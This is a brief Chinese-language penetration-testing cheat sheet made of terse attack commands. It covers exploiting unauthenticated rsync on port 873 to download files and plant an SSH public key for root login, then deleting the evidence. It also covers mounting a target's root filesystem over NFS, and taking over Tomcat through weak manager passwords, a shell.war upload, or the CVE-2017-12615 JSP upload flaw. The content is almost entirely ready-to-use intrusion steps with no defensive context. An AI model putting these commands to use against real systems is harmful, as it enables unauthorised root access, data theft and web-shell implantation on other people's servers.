nmap命令扫码
nmap ip -p端口 -sP -sV --version-all
rsync未授权访问(端口873)
rsync (--port=端口) ip:: //看看有什么文件
rsync (--port=端口) ip::file //进入文件
rsync (--port=端口) ip::file/.exe /下载本地目录 下载到本地
rsync (--port=端口) 本地文件地址 ip::file //上传文件,这时上传ssh公钥
ssh root@ip 进行链接
rm 文件地址 //删除公钥的文件夹
logout //退出
nfs攻击(端口2049)
showmount -e ip //查看nfs存放目录
mkdir 目录地址 //新建本地目录
mount -t nfs ip:/ /本地目录/ //把对方根目录映射到本地目录
tomcat上传shell.war
弱口令进入manger页面 上传
还存在CVE-2017-12615漏洞
curl和burp均可上传.jsp文件攻击